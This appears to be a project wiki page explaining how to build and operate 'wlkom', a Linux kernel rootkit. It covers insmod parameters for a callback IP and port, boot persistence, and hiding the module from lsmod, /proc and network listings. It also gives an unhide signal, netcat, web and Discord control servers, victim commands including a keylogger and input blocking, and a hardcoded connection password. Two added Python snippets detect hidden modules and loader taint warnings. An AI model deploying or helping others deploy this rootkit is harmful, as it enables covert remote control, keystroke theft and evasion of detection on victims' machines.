Usage Guide

a5traa edited this page Jun 14, 2025 · 6 revisions

Compiling the Module

To compile the kernel module, run:

make

Inserting the Module into the Kernel

You can pass the ip, port, persistence, hide and debug arguments when inserting the module. The defaults are ip=127.0.0.1, port=4242, persistence=NULL, hide=OFF and debug=ON.

sudo insmod wlkom.ko ip=$IP port=$PORT persistence=$PERSISTENCE hide=$HIDE debug=$DEBUG

ip argument

  • Description: Specifies the IP address to which the module will connect for remote communication.
  • Default: 127.0.0.1 (localhost).

port argument

  • Description: Specifies the port number on which the module will establish the connection for remote communication.
  • Default: 4242.

persistence argument

  • Description: Defines whether the module should automatically load on boot.
  • Values:
    • ON: Enables persistence, meaning the module will reload on the next reboot with the same arguments.
    • OFF: Disables persistence, meaning the module will not automatically load after a reboot.
    • NULL: Default option, has no effect on persistence.
  • Default: NULL.

hide argument

  • Description: Enables stealth mode, hiding the module from standard system inspection tools and interfaces.
  • Values:
    • ON: Hides the module from:
      • lsmod output,
      • /proc/modules and /proc/kallsyms,
      • process listings,
      • network information files such as /proc/net/tcp and /proc/net/udp.
      While hidden, the module cannot be removed with rmmod. To unhide it and make it removable again, run:
      kill -42 1
    • OFF: Disables hiding. The module remains fully visible in the system.
  • Default: OFF.
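From the defender's side, the hide option above is worth pairing with a cross-check. The following is an added example, not code from the wlkom project: it compares the module names in /proc/modules (the list lsmod reads) with the loadable-module directories under /sys/module, a separate kernel view. The two file paths are real Linux interfaces; the /proc/modules text and sysfs name list in the sample are constructed. A module missing from one view but present in the other is a strong signal; an empty result is not proof of a clean host, since a rootkit may unlink itself from both.

```python
# Added example (not part of the wlkom project): cross-check the kernel's two
# module views to spot a module that has been unlinked from the lsmod list.
import os

PROC_MODULES = "/proc/modules"
SYS_MODULE = "/sys/module"


def parse_proc_modules(text):
    """Return the module names from text in /proc/modules format
    (the first whitespace-separated field of each line)."""
    names = set()
    for line in text.splitlines():
        fields = line.split()
        if fields:
            names.add(fields[0])
    return names


def find_hidden(proc_text, sysfs_names):
    """Names present in the sysfs view but absent from /proc/modules, sorted.

    proc_text: contents of /proc/modules.
    sysfs_names: loadable-module names taken from /sys/module.
    """
    listed = parse_proc_modules(proc_text)
    return sorted(set(sysfs_names) - listed)


def live_sysfs_modules(sysfs_dir=SYS_MODULE):
    """Loadable modules under /sys/module. Built-in code also gets a directory
    there (for its parameters) but has no 'initstate' file, so that file is
    required to avoid flagging built-ins as hidden."""
    names = []
    try:
        entries = os.listdir(sysfs_dir)
    except OSError:
        return names
    for name in entries:
        if os.path.exists(os.path.join(sysfs_dir, name, "initstate")):
            names.append(name)
    return names


def audit_live():
    """Run the cross-check against the running kernel (Linux only)."""
    with open(PROC_MODULES) as fh:
        proc_text = fh.read()
    return find_hidden(proc_text, live_sysfs_modules())


# Constructed sample: two ordinary modules are listed normally, while 'wlkom'
# appears only in the sysfs view. Sizes and addresses are made up.
SAMPLE_PROC_MODULES = """\
ext4 933888 1 - Live 0xffffffffc0a00000
xfs 1605632 0 - Live 0xffffffffc0b00000
"""
SAMPLE_SYSFS_MODULES = ["ext4", "xfs", "wlkom"]

if __name__ == "__main__":
    print("hidden in sample:", find_hidden(SAMPLE_PROC_MODULES, SAMPLE_SYSFS_MODULES))
    if os.path.exists(PROC_MODULES):
        print("hidden on this host:", audit_live())
```

Run it as root on the host under review; the sample check needs no privileges and shows the expected shape of a hit.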

debug argument

  • Description: Controls whether printk messages from the rootkit are shown in the logs.
  • Values:
    • ON: (Default) All printk messages will be visible in the dmesg logs.
    • OFF: Disables printk messages, and no output will appear in the dmesg logs.
  • Default: ON.

Launching a Remote Shell Control Server

You need to launch a server to communicate with the module and receive results. There are several ways to do this:

Netcat Server

Start a local Netcat server by running:

nc -l 127.0.0.1 4242

Web Server

Alternatively, you can start a web server by running:

python attacking_program/app.py

Discord Bot Server

To use the Discord bot for remote control, follow these steps:

  1. Enter your bot token in the file /rootkit/discord/config/config.json.
  2. Execute the initialization script:
     ./rootkit/discord/init.sh
  3. Start the Discord bot by running:
     python3 /rootkit/discord/main.py

Viewing Logs

To view logs, you can use the dmesg command from another terminal:

sudo dmesg -T -L -W

  • -T: Displays timestamps in a human-readable format.
  • -L: Adds color to the text for better readability.
  • -W: Waits for and prints only new messages, not those already in the kernel log buffer from startup.

If the debug argument is set to ON, all printk messages will be visible in the logs.
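Note that the debug argument only governs the rootkit's own printk calls. When an unsigned, out-of-tree module is inserted, the kernel's module loader writes its own warnings to the log and sets bits in the taint mask, and neither depends on debug. The following is an added example, not code from the wlkom project: it picks those loader warnings out of dmesg -T style lines and decodes a subset of the kernel taint flags. The message texts and taint bit positions are those of the mainline Linux module loader; the log lines in the sample are constructed.

```python
# Added example (not part of the wlkom project): find the module loader's own
# warnings in `dmesg -T` output and decode the kernel taint mask.
import re

# Constructed sample in `dmesg -T` format. The third line is an ordinary
# message that must be ignored.
SAMPLE_LOG = """\
[Sat Jun 14 10:00:01 2025] wlkom: loading out-of-tree module taints kernel.
[Sat Jun 14 10:00:01 2025] wlkom: module verification failed: signature and/or required key missing - tainting kernel
[Sat Jun 14 10:00:02 2025] usb 1-1: new high-speed USB device number 3 using xhci_hcd
"""

# Texts the mainline module loader prints when a module taints the kernel.
LOADER_WARNINGS = {
    "loading out-of-tree module taints kernel": "out-of-tree",
    "module verification failed: signature and/or required key missing - tainting kernel": "unsigned",
}

# "[timestamp] <module>: <message>" with an optional trailing period.
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\]\s+(?P<mod>[A-Za-z0-9_]+): (?P<msg>.*?)\.?$")


def module_load_warnings(lines):
    """Return (timestamp, module, reason) for every loader warning in lines."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.rstrip("\n"))
        if not m:
            continue
        reason = LOADER_WARNINGS.get(m.group("msg"))
        if reason:
            hits.append((m.group("ts"), m.group("mod"), reason))
    return hits


# Subset of the kernel's taint bits (the integer in /proc/sys/kernel/tainted).
TAINT_BITS = {
    0: ("P", "proprietary module loaded"),
    1: ("F", "module force-loaded"),
    3: ("R", "module force-unloaded"),
    6: ("U", "userspace requested taint"),
    9: ("W", "kernel warning hit"),
    12: ("O", "out-of-tree module loaded"),
    13: ("E", "unsigned module loaded"),
}


def decode_taint(mask):
    """Return the flag letters set in a taint mask, in bit order."""
    return [letter for bit, (letter, _) in sorted(TAINT_BITS.items())
            if mask & (1 << bit)]


def read_live_taint(path="/proc/sys/kernel/tainted"):
    """Read the running kernel's taint mask (Linux only)."""
    with open(path) as fh:
        return int(fh.read().strip())


if __name__ == "__main__":
    for ts, mod, reason in module_load_warnings(SAMPLE_LOG.splitlines()):
        print(f"{ts}: module {mod} loaded ({reason})")
    try:
        print("live taint flags:", decode_taint(read_live_taint()))
    except OSError:
        print("no /proc/sys/kernel/tainted on this host")
```

The loader warnings stay in the kernel log buffer after insertion, and the taint mask is not cleared until reboot, so both survive a later rmmod; on a host that forwards kernel logs off-box they also survive local cleanup.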

Special Commands

Several special commands have been integrated into the rootkit. These commands all start with the prefix /. To see a detailed list of available commands, execute /help. For help on a specific command, execute /help <command>. The following special commands are available:

  • /sysinfo: Retrieves system information from the victim machine.
  • /enable <option>: Enables the specified option on the victim machine.
  • /disable <option>: Disables the specified option on the victim machine.
  • /selfdestruction: Completely removes all traces of the rootkit module from the system.

The <option> argument for both /enable and /disable currently supports the following choices:

  • keyboard: Blocks or unblocks keyboard input.
  • mouse: Blocks or unblocks mouse usage.
  • keylogger: Enables or disables a keylogger.

Password Protection on Connection

Regardless of the connection method (Netcat, web server, Discord bot, etc.), a password will be requested upon each new connection. The prompt appears as follows:

$ nc -l 127.0.0.1 4242
New connection. Please enter the password: 
  • The required password is:

    epita
    
  • For security, after every 3 failed password attempts the wait time before the next set of retries increases progressively, starting at 60 seconds and escalating until it ultimately triggers the self-destruction of the module, which prevents brute-force attacks.

Removing the Module

To remove the kernel module, run:

sudo rmmod wlkom

Important:

  • If the persistence option was set to ON and you want to disable persistence, reload the module with persistence disabled (insmod takes the .ko file, as in the insertion command above):

    sudo insmod wlkom.ko persistence=OFF

    This will prevent the module from loading automatically on the next reboot.

  • If the hide option was set to ON, the module is hidden and cannot be removed directly.
    You must unhide it first by executing:

    kill -42 1

Once the module is unhidden (if needed), you can safely remove it with rmmod.